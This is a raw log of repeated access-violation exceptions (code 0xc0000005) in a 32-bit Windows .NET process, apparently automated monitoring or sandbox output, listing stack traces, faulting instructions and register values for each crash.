1 0 0

__exception__

 stacktrace: 
0xc8e740
0xc8f643
0xc8f128
0xc8a3c5
0xc893a7
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254488
registers.edi: 4254788
registers.eax: 0
registers.ebp: 4254496
registers.edx: 0
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 48192716
1 0 0

__exception__

 stacktrace: 
0xc8f9d3
0xc8f8a0
0xc8a3ad
0xc89494
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254360
registers.edi: 4254584
registers.eax: 0
registers.ebp: 4254596
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xc8e740
0xc8fbf5
0xc8f8a0
0xc8a3ad
0xc89494
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254572
registers.edi: 4254788
registers.eax: 0
registers.ebp: 4254580
registers.edx: 0
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 46980120
1 0 0

__exception__

 stacktrace: 
0xc8f9d3
0xc8f8a0
0xc8a3c5
0xc89494
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254360
registers.edi: 4254584
registers.eax: 0
registers.ebp: 4254596
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xc8e740
0xc8fbf5
0xc8f8a0
0xc8a3c5
0xc89494
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254572
registers.edi: 4254788
registers.eax: 0
registers.ebp: 4254580
registers.edx: 0
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 45687368
1 0 0

__exception__

 stacktrace: 
0xc8f9d3
0xc8f8a0
0xc8a3c5
0xc89494
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254360
registers.edi: 4254584
registers.eax: 0
registers.ebp: 4254596
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xc8e740
0xc8fbf5
0xc8f8a0
0xc8a3c5
0xc89494
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254572
registers.edi: 4254788
registers.eax: 0
registers.ebp: 4254580
registers.edx: 0
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 45687396
1 0 0

__exception__

 stacktrace: 
0xc8e740
0x2430b83
0x24303da
0xc8880c
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254948
registers.edi: 4255164
registers.eax: 0
registers.ebp: 4254956
registers.edx: 0
registers.ebx: 4256364
registers.esi: 46212672
registers.ecx: 46219648
1 0 0

__exception__

 stacktrace: 
0xb43d4c
0xb43c6e
0xb42505
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb43e40
registers.esp: 2026536
registers.edi: 2026588
registers.eax: 0
registers.ebp: 2026600
registers.edx: 5674984
registers.ebx: 2027484
registers.esi: 43389268
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xb4ef56
0xb4ee17
0xb4ed15
0xb4d972
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 24 30 ee 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb4f85e
registers.esp: 2025380
registers.edi: 2025604
registers.eax: 0
registers.ebp: 2025616
registers.edx: 15609524
registers.ebx: 2027484
registers.esi: 44192100
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x4873128
0xb4f38b
0xb4ee17
0xb4ed15
0xb4d972
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x487316b
registers.esp: 2025592
registers.edi: 2025880
registers.eax: 0
registers.ebp: 2025600
registers.edx: 0
registers.ebx: 2027484
registers.esi: 44192100
registers.ecx: 45441280
1 0 0

__exception__

 stacktrace: 
0xb4ef56
0xb4ee17
0xb4ed2d
0xb4d972
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 24 30 ee 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb4f85e
registers.esp: 2025380
registers.edi: 2025604
registers.eax: 0
registers.ebp: 2025616
registers.edx: 15609524
registers.ebx: 2027484
registers.esi: 44192100
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x4873128
0xb4f38b
0xb4ee17
0xb4ed2d
0xb4d972
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x487316b
registers.esp: 2025592
registers.edi: 2025880
registers.eax: 0
registers.ebp: 2025600
registers.edx: 0
registers.ebx: 2027484
registers.esi: 44192100
registers.ecx: 46871764
1 0 0

__exception__

 stacktrace: 
0xb4ef56
0xb4ee17
0xb4ed2d
0xb4d972
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 24 30 ee 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb4f85e
registers.esp: 2025380
registers.edi: 2025604
registers.eax: 0
registers.ebp: 2025616
registers.edx: 15609524
registers.ebx: 2027484
registers.esi: 44192100
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x4873128
0xb4f38b
0xb4ee17
0xb4ed2d
0xb4d972
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

